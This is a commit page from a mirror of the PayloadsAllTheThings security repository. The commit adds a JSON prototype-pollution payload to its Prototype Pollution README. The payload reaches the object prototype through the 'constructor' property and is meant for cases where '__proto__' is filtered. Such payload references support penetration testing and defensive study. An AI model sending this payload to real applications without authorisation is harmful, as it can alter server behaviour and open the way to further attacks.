weyne/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/weyne85/PayloadsAllTheThings.git synced 2025-10-29 16:57:02 +00:00
Code Issues Packages Projects Releases Wiki Activity

adding the payload for Polluting the prototype via the constructor property in JSON input

Browse Source 
Somtimes `__proto__` property may not work, so adding the payload for Polluting the prototype via the `constructor` property in JSON input
This commit is contained in:
Aftab Sama 2024-01-03 17:24:28 +05:30 committed by GitHub
parent cbc6e78d2a
commit 08063f0830
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
Prototype Pollution/README.md
View File

@ -99,6 +99,19 @@ Asynchronous payload for NodeJS.
}
```
Polluting the prototype via the `constructor` property instead.
```js
{
"constructor": {
"prototype": {
"foo": "bar",
"json spaces": 10
}
}
}
```
### Prototype Pollution in URL